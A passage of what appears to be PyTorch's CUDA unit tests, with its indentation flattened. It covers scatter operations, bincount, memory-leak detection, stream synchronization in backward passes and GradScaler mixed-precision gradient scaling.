AbstractTestCases._TestTorchMixin._test_scatter_add_mult_index_base(self, lambda t: t.cuda())
def test_tensor_scatterFill(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False)
def test_tensor_scatter_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', test_bounds=False, test_complex=True)
def test_tensor_scatterAdd_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_add_', test_bounds=False, test_complex=True)
def test_tensor_scatterFill_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False, test_complex=True)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
# 35488 * 65536 as int32 would cause overflow to negative value
# giving negative bin offset
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Test that wrap_with_cuda_memory_check successfully detects leak
# skip for ROCM. Look into #62533.
@skipIfRocm
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
l.append(torch.tensor(10, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 0"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
l.append(torch.tensor(10, device=torch.device("cuda:1")))
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 1"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
# this might create a reference cycle on self...
def _make_multiply_in_stream(self):
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x, val):
ctx.val = val
ctx.stream = torch.cuda.current_stream()
return x * val
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), ctx.stream)
# delays the operation in the the background stream
torch.cuda._sleep(1000 * 5000)
return grad * ctx.val, None
return MultiplyInStream
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
MultiplyInStream = self._make_multiply_in_stream()
# Tests using grads outside the backward() stream context
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 2)
output.sum().backward()
# sync needed
default_stream.wait_stream(stream)
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
# Tests that using grads in the same stream context as backward()
# is safe regardless what streams bwd ops ran on
bwd_ambient_stream = torch.cuda.Stream()
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 3)
with torch.cuda.stream(bwd_ambient_stream):
bwd_ambient_stream.wait_stream(stream)
output.sum().backward()
# x was first used on "stream" so its AccumulateGrad leaf should run on "stream".
# The end of backward() should have synced "bwd_ambient_stream" with "stream"
# so it should be safe to use x.grad here without any syncs.
self.assertEqual(x.grad, torch.ones_like(x) * 3)
self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream)
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_streaming_backwards_multiple_streams(self):
MultiplyInStream = self._make_multiply_in_stream()
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x, x_first_use_on_ambient):
if x_first_use_on_ambient:
x0 = x.clone()
self.stream0.wait_stream(torch.cuda.current_stream())
self.stream1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stream0):
if not x_first_use_on_ambient:
x0 = x.clone()
y0 = MultiplyInStream.apply(x0, 2)
self.event.record(stream=torch.cuda.current_stream())
with torch.cuda.stream(self.stream1):
y1 = MultiplyInStream.apply(x, 3)
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
for x_first_use_on_ambient in (True, False):
# the out_of_place=False, iters=1 case stresses if proper syncs are inserted
# when grads are initially None and stolen by backward ops.
for out_of_place, iters in ((True, 1),
(False, 1),
(False, 5)):
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
model = StreamModel().cuda()
x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(),
stream if x_first_use_on_ambient else model.stream0))
for p in model.parameters():
self.assertTrue(p.grad is None)
for i in range(iters):
loss = model(x, x_first_use_on_ambient).sum()
if out_of_place:
x_grad = torch.autograd.grad((loss,), (x,))[0]
else:
loss.backward()
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
torch.cuda.current_stream().wait_stream(stream)
if out_of_place:
self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters)
else:
self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so to's backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backwards_sync_graph_root(self):
# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_ops_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# assertEquals below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
def test_streaming_backwards_callback(self):
# Tests if autograd callbacks sync properly with respect to leaf streams and
# the user-facing stream surrounding backward(). If it fails, first suspect is
# sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp
MultiplyInStream = self._make_multiply_in_stream()
size = int(1e3)
a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
stash = []
# sets up a nontrivial structure of leaf streams
s0.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s0):
c = MultiplyInStream.apply(a, 2)
s1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s1):
d = MultiplyInStream.apply(b, 3)
s1.wait_stream(s0)
e = c * d
def clone_leaf_grads():
stash.append(a.grad.clone())
stash.append(b.grad.clone())
# Use a hook on e to install the callback
e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads))
s2.wait_stream(s1)
with torch.cuda.stream(s2):
e.sum().backward()
# The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2.
# If those things happened properly, checking the values of the cloned grads on s2 should be safe:
self.assertEqual(stash[0], torch.full_like(a, 6))
self.assertEqual(stash[1], torch.full_like(a, 6))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t() which is not contiguous but still non overlapping and dense
# - variants of g.clone()[:, :5] which are not non overlapping and dense
# Non overlapping and dense grads route into a multi tensor apply kernel,
# others use a fallback per-tensor kernel, so we should try both.
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected, ensures unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
else:
# inf was injected, ensures inf was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
# Simulates 2 consecutive unskipped iterations
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s / 4).to_dense())
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s.half() / 4).to_dense())
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_non_finite_check_and_unscale_ should report an overflow here.
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior, and may
# error otherwise in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a random value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically-large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# len(data) - skipped times and the backoff factor "skipped" times.
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertEqual(c, s, atol=atol, rtol=1e-05)
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.autocast('cuda', enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
